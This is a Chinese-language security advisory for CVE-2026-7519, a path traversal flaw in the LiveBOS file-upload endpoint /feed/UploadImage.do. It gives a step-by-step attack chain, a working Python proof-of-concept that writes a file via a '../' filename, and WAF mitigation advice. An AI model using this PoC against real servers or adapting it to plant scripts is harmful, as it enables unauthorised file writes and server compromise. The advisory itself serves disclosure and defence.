CVE-2026-7519 CVSS 7.3 高危

CVE-2026-7519: Fujian Apex LiveBOS路径遍历漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7519

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fujian Apex LiveBOS

漏洞概述

Fujian Apex LiveBOS 2.0及以下版本中的/feed/UploadImage.do接口存在路径遍历漏洞。攻击者可通过恶意构造filename参数，绕过服务器限制，远程利用该漏洞在任意路径写入文件，影响系统机密性、完整性和可用性。

技术细节

该漏洞源于Fujian Apex LiveBOS系统在处理文件上传功能时，对用户输入的filename参数缺乏有效的安全过滤。在Endpoint组件的/feed/UploadImage.do接口中，程序直接使用用户提供的filename值进行文件操作，未进行路径规范化处理。攻击者可以通过在filename参数中插入“../”等目录遍历序列，将上传的文件保存到Web根目录之外的任意系统目录。由于攻击无需认证（PR:N）且无用户交互（UI:N），攻击者可轻易利用此漏洞进行远程攻击，可能覆盖系统关键文件或写入恶意脚本，导致服务器被控制。

攻击链分析

STEP 1

信息收集

识别目标系统为Fujian Apex LiveBOS，并确认版本低于或等于2.0。

STEP 2

漏洞利用

向/feed/UploadImage.do发送POST请求，在filename参数中注入“../”路径遍历载荷。

STEP 3

文件写入

服务器未过滤特殊字符，将文件上传至系统非预期目录（如系统临时目录或配置目录）。

STEP 4

影响达成

成功写入文件后，可能导致敏感信息泄露、系统配置篡改或进一步的后门植入。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    """
    PoC for CVE-2026-7519: Path Traversal in Fujian Apex LiveBOS
    """
    upload_url = f"{target_url}/feed/UploadImage.do"
    
    # Malicious filename using path traversal sequences
    payload_filename = "../../tmp/vuln_test.txt"
    
    files = {
        'file': ('blob.txt', b'CVE-2026-7519_POC_TEST', 'text/plain')
    }
    
    data = {
        'filename': payload_filename
    }
    
    try:
        response = requests.post(upload_url, files=files, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {upload_url}")
            print(f"[+] Server response: {response.text[:100]}")
            print("[+] Check if the file was created at ../../tmp/vuln_test.txt")
        else:
            print(f"[-] Exploit failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    exploit(target)

影响范围

Fujian Apex LiveBOS <= 2.0

防御指南

临时缓解措施

在未升级版本前，建议在服务器前端部署Web应用防火墙（WAF），严格检查HTTP请求中filename参数的内容，禁止包含路径跳转字符。同时，检查服务器文件系统中是否存在异常的新建文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7519
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7519
3 Details https://www.cvedetails.com/cve/CVE-2026-7519/
4 VulDB https://vuldb.com/cve/CVE-2026-7519
5 Link https://my.feishu.cn/docx/TCyMdptvaoTQCvxkHLbceJZCnge?from=from_copylink
6 Link https://vuldb.com/submit/804096
7 Link https://vuldb.com/vuln/360333
8 Link https://vuldb.com/vuln/360333/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表